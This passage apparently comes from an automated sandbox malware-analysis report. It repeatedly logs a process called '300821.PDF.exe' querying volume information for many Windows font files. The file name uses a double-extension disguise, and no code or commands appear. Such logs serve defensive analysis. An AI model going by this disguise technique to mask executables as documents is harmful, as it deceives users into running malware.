                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
